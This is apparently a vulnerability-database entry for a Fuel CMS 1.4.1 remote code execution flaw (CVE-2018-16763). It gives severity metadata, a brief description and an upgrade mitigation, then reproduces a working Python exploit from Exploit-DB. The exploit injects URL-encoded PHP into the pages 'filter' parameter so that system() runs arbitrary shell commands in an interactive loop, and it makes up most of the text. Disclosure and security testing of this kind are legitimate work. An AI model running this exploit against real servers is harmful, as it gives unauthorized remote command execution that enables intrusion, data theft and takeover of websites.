fuel CMS 1.4.1 - Remote Code Execution (1)

vendor:

Fuel CMS

by:

0xd0ff9

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: Fuel CMS

Affected Version From: <= 1.4.1

Affected Version To: None

Patch Exists: YES

Related CWE: CVE-2018-16763

CPE: a:daylight_studio:fuel_cms

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu - Apache2 - php5

2019

fuel CMS 1.4.1 – Remote Code Execution (1)

An attacker can execute arbitrary code on the vulnerable system by sending a crafted HTTP request to the vulnerable application. This is due to the application not properly sanitizing user-supplied input before using it in a dynamic function call. This vulnerability affects fuel CMS version 1.4.1 and earlier.

Mitigation:

Upgrade to the latest version of fuel CMS.

Source

Exploit-DB raw data:

# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
	xxxx = raw_input('cmd:')
	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
	proxy = {"http":"http://127.0.0.1:8080"}
	r = requests.get(burp0_url, proxies=proxy)

	html = "<!DOCTYPE html>"
	htmlcharset = r.text.find(html)

	begin = r.text[0:20]
	dup = find_nth_overlapping(r.text,begin,2)

	print r.text[0:dup]